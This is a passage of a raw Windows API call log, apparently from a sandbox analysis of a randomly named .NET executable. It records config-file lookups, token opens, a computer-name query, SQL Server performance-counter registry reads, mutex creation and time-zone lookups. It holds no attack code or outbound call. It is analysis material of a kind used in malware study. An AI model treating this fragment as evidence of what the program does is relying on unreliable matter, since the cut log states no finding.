pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x0, puLen=0x4deab4) returned 0 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4deaac, puLen=0x4deaa8 | out: lplpBuffer=0x4deaac*=0x2249d40, puLen=0x4deaa8) returned 1 [0158.708] VerLanguageNameW (in: wLang=0x0, szLang=0x4de83c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\", lplpBuffer=0x4deabc, puLen=0x4deab8 | out: lplpBuffer=0x4deabc*=0x2249ccc, puLen=0x4deab8) returned 1 [0158.709] CoTaskMemAlloc (cb=0x20c) returned 0x7cf940 [0158.709] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7cf940 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0158.710] CoTaskMemFree (pv=0x7cf940) [0158.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x4de5dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0158.710] CoTaskMemAlloc (cb=0x20c) returned 0x7cf940 [0158.710] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x7cf940 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0158.710] CoTaskMemFree (pv=0x7cf940) [0158.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x4de5dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0158.710] GetCurrentProcess () returned 0xffffffff [0158.710] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dea74 | out: TokenHandle=0x4dea74*=0x294) returned 1 [0158.711] GetCurrentProcess () returned 0xffffffff [0158.711] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dea74 | out: TokenHandle=0x4dea74*=0x298) returned 1 [0158.711] GetCurrentProcess () returned 0xffffffff [0158.711] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4de940 | out: TokenHandle=0x4de940*=0x29c) returned 1 [0158.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\chfiqxtpqp.exe_url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x4de940 | out: lpFileInformation=0x4de940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x4de3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x82 [0158.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\chfiqxtpqp.exe_url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x4de940 | out: lpFileInformation=0x4de940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.712] GetCurrentProcess () returned 0xffffffff [0158.712] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dea74 | out: TokenHandle=0x4dea74*=0x2a0) returned 1 [0158.712] GetCurrentProcess () returned 0xffffffff [0158.712] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4de940 | out: TokenHandle=0x4de940*=0x2a4) returned 1 [0158.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\chfiqxtpqp.exe_url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x4de940 | out: lpFileInformation=0x4de940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.712] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x4de3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x80 [0158.713] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\chfiqxtpqp.exe_url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x4de940 | out: lpFileInformation=0x4de940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.713] GetCurrentProcess () returned 0xffffffff [0158.713] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb54 | out: TokenHandle=0x4deb54*=0x2a8) returned 1 [0158.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x4de600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0158.714] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x4deb54 | out: lpFileInformation=0x4deb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0158.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x4de58c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0158.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4dea80) returned 1 [0158.714] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2ac [0158.714] GetFileType (hFile=0x2ac) returned 0x1 [0158.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4dea7c) returned 1 [0158.714] GetFileType (hFile=0x2ac) returned 0x1 [0158.714] GetFileSize (in: hFile=0x2ac, lpFileSizeHigh=0x4deb48 | out: lpFileSizeHigh=0x4deb48*=0x0) returned 0x8c8f [0158.714] ReadFile (in: hFile=0x2ac, lpBuffer=0x22508cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4deb04, lpOverlapped=0x0 | out: lpBuffer=0x22508cc*, lpNumberOfBytesRead=0x4deb04*=0x1000, lpOverlapped=0x0) returned 1 [0158.715] ReadFile (in: hFile=0x2ac, lpBuffer=0x22508cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de9a0, lpOverlapped=0x0 | out: lpBuffer=0x22508cc*, lpNumberOfBytesRead=0x4de9a0*=0x1000, lpOverlapped=0x0) returned 1 [0158.715] ReadFile (in: hFile=0x2ac, lpBuffer=0x22508cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de854, lpOverlapped=0x0 | out: lpBuffer=0x22508cc*, lpNumberOfBytesRead=0x4de854*=0x1000, lpOverlapped=0x0) returned 1 [0158.715] ReadFile (in: hFile=0x2ac, lpBuffer=0x22508cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de854, lpOverlapped=0x0 | out: lpBuffer=0x22508cc*, lpNumberOfBytesRead=0x4de854*=0x1000, lpOverlapped=0x0) returned 1 [0158.715] ReadFile (in: hFile=0x2ac, lpBuffer=0x22508cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de854, lpOverlapped=0x0 | out: lpBuffer=0x22508cc*, lpNumberOfBytesRead=0x4de854*=0x1000, lpOverlapped=0x0) returned 1 [0158.716] ReadFile (in: hFile=0x2ac, lpBuffer=0x22508cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de78c, lpOverlapped=0x0 | out: lpBuffer=0x22508cc*, lpNumberOfBytesRead=0x4de78c*=0x1000, lpOverlapped=0x0) returned 1 [0158.716] CloseHandle (hObject=0x2ac) returned 1 [0158.716] GetCurrentProcess () returned 0xffffffff [0158.716] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb10 | out: TokenHandle=0x4deb10*=0x2ac) returned 1 [0158.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0158.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x4deb10 | out: lpFileInformation=0x4deb10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.717] GetCurrentProcess () returned 0xffffffff [0158.717] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deacc | out: TokenHandle=0x4deacc*=0x2b0) returned 1 [0158.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x4de578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x82 [0158.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\chfiqxtpqp.exe_url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x4deacc | out: lpFileInformation=0x4deacc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.718] GetCurrentProcess () returned 0xffffffff [0158.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dea88 | out: TokenHandle=0x4dea88*=0x2b4) returned 1 [0158.718] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x4de534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x80 [0158.718] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\ChFIQxtpqP.exe_Url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\chfiqxtpqp.exe_url_pgtlqwziabthte2s3uiljvbc1p4ofxwr\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x4dea88 | out: lpFileInformation=0x4dea88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.734] GetCurrentProcess () returned 0xffffffff [0158.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4de938 | out: TokenHandle=0x4de938*=0x2b8) returned 1 [0158.740] GetCurrentProcess () returned 0xffffffff [0158.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4de878 | out: TokenHandle=0x4de878*=0x2bc) returned 1 [0158.748] GetCurrentProcess () returned 0xffffffff [0158.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4de8c0 | out: TokenHandle=0x4de8c0*=0x2c0) returned 1 [0158.928] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x7a8820 [0158.944] GetCurrentProcessId () returned 0x678 [0158.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x4de0f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0158.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x4de070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0158.970] CoTaskMemAlloc (cb=0x3a) returned 0x7cb780 [0158.971] CoTaskMemAlloc (cb=0xc8) returned 0x7d8200 [0158.971] CoTaskMemFree (pv=0x7cb780) [0158.971] CoTaskMemFree (pv=0x7d8200) [0159.176] GetComputerNameW (in: lpBuffer=0x4dd4bc, nSize=0x2281cf0 | out: lpBuffer="XDUWTFONO", nSize=0x2281cf0) returned 1 [0159.183] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET Data Provider for SqlServer\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x4dd6f4 | out: phkResult=0x4dd6f4*=0x2c4) returned 0x0 [0159.184] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x4dd708, lpData=0x0, lpcbData=0x4dd704*=0x0 | out: lpType=0x4dd708*=0x1, lpData=0x0, lpcbData=0x4dd704*=0x1c) returned 0x0 [0159.184] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x4dd708, lpData=0x228297c, lpcbData=0x4dd704*=0x1c | out: lpType=0x4dd708*=0x1, lpData="netfxperf.dll", lpcbData=0x4dd704*=0x1c) returned 0x0 [0159.185] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x4dd714, lpData=0x0, lpcbData=0x4dd710*=0x0 | out: lpType=0x4dd714*=0x4, lpData=0x0, lpcbData=0x4dd710*=0x4) returned 0x0 [0159.185] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x4dd714, lpData=0x4dd700, lpcbData=0x4dd710*=0x4 | out: lpType=0x4dd714*=0x4, lpData=0x4dd700*=0x1, lpcbData=0x4dd710*=0x4) returned 0x0 [0159.185] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x4dd714, lpData=0x0, lpcbData=0x4dd710*=0x0 | out: lpType=0x4dd714*=0x4, lpData=0x0, lpcbData=0x4dd710*=0x4) returned 0x0 [0159.185] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x4dd714, lpData=0x4dd700, lpcbData=0x4dd710*=0x4 | out: lpType=0x4dd714*=0x4, lpData=0x4dd700*=0x1386, lpcbData=0x4dd710*=0x4) returned 0x0 [0159.185] RegCloseKey (hKey=0x2c4) returned 0x0 [0159.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net data provider for sqlserver\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x4dd6ec | out: phkResult=0x4dd6ec*=0x2c4) returned 0x0 [0159.190] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x4dd70c, lpData=0x0, lpcbData=0x4dd708*=0x0 | out: lpType=0x4dd70c*=0x4, lpData=0x0, lpcbData=0x4dd708*=0x4) returned 0x0 [0159.190] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x4dd70c, lpData=0x4dd6f8, lpcbData=0x4dd708*=0x4 | out: lpType=0x4dd70c*=0x4, lpData=0x4dd6f8*=0x3, lpcbData=0x4dd708*=0x4) returned 0x0 [0159.190] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x4dd70c, lpData=0x0, lpcbData=0x4dd708*=0x0 | out: lpType=0x4dd70c*=0x4, lpData=0x0, lpcbData=0x4dd708*=0x4) returned 0x0 [0159.190] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x4dd70c, lpData=0x4dd6f8, lpcbData=0x4dd708*=0x4 | out: lpType=0x4dd70c*=0x4, lpData=0x4dd6f8*=0x20000, lpcbData=0x4dd708*=0x4) returned 0x0 [0159.190] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x4dd70c, lpData=0x0, lpcbData=0x4dd708*=0x0 | out: lpType=0x4dd70c*=0x3, lpData=0x0, lpcbData=0x4dd708*=0x30a) returned 0x0 [0159.190] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x4dd70c, lpData=0x2283268, lpcbData=0x4dd708*=0x30a | out: lpType=0x4dd70c*=0x3, lpData=0x2283268*, lpcbData=0x4dd708*=0x30a) returned 0x0 [0159.193] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0159.198] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x4dd648, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x0 [0159.200] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x2c8 [0159.201] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3b0000 [0159.202] VirtualQuery (in: lpAddress=0x3b0000, lpBuffer=0x4dd6ec, dwLength=0x1c | out: lpBuffer=0x4dd6ec*(BaseAddress=0x3b0000, AllocationBase=0x3b0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0159.203] LocalFree (hMem=0x7be108) returned 0x0 [0159.204] RegCloseKey (hKey=0x2c4) returned 0x0 [0159.210] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2284794, cbSid=0x4dd6c8 | out: pSid=0x2284794*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.214] CreateMutexW (lpMutexAttributes=0x22848a8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.215] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.217] GetTimeZoneInformation (in: lpTimeZoneInformation=0x4dd4b4 | out: lpTimeZoneInformation=0x4dd4b4) returned 0x2 [0159.220] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x4dd308 | out: pTimeZoneInformation=0x4dd308) returned 0x2 [0159.222] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x4dd3ec | out: phkResult=0x4dd3ec*=0x2cc) returned 0x0 [0159.223] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x4dd408, lpData=0x0, lpcbData=0x4dd404*=0x0 | out: lpType=0x4dd408*=0x3, lpData=0x0, lpcbData=0x4dd404*=0x2c) returned 0x0 [0159.223] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x4dd408, lpData=0x228539c, lpcbData=0x4dd404*=0x2c | out: lpType=0x4dd408*=0x3, lpData=0x228539c*, lpcbData=0x4dd404*=0x2c) returned 0x0 [0159.223] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x4dd240 | out: phkResult=0x4dd240*=0x2d0) returned 0x0 [0159.223] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x4dd25c, lpData=0x0, lpcbData=0x4dd258*=0x0 | out: lpType=0x4dd25c*=0x4, lpData=0x0, lpcbData=0x4dd258*=0x4) returned 0x0 [0159.224] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x4dd25c, lpData=0x4dd248, lpcbData=0x4dd258*=0x4 | out: lpType=0x4dd25c*=0x4, lpData=0x4dd248*=0x7d7, lpcbData=0x4dd258*=0x4) returned 0x0 [0159.224] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x4dd25c, lpData=0x0, lpcbData=0x4dd258*=0x0 | out: lpType=0x4dd25c*=0x4, lpData=0x0, lpcbData=0x4dd258*=0x4) returned 0x0 [0159.224] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x4dd25c, lpData=0x4dd248, lpcbData=0x4dd258*=0x4 | out: lpType=0x4dd25c*=0x4, lpData=0x4dd248*=0x7d8, lpcbData=0x4dd258*=0x4) returned 0x0 [0159.224] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x4dd25c, lpData=0x0, lpcbData=0x4dd258*=0x0 | out: lpType=0x4dd25c*=0x3, lpData=0x0, lpcbData=0x4dd258*=0x2c) returned 0x0 [0159.224] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x4dd25c, lpData=0x2285900, lpcbData=0x4dd258*=0x2c | out: lpType=0x4dd25c*=0x3, lpData=0x2285900*, lpcbData=0x4dd258*=0x2c) returned 0x0 [0159.224] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x4dd25c, lpData=0x0, lpcbData=0x4dd258*=0x0 | out: lpType=0x4dd25c*=0x3, lpData=0x0, lpcbData=0x4dd258*=0x2c) returned 0x0 [0159.224] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x4dd25c, lpData=0x22859c0, lpcbData=0x4dd258*=0x2c | out: lpType=0x4dd25c*=0x3, lpData=0x22859c0*, lpcbData=0x4dd258*=0x2c) returned 0x0 [0159.224] RegCloseKey (hKey=0x2d0) returned 0x0 [0159.225] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x4dd3e0, lpData=0x0, lpcbData=0x4dd3dc*=0x0 | out: lpType=0x4dd3e0*=0x1, lpData=0x0, lpcbData=0x4dd3dc*=0x20) returned 0x0 [0159.225] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, 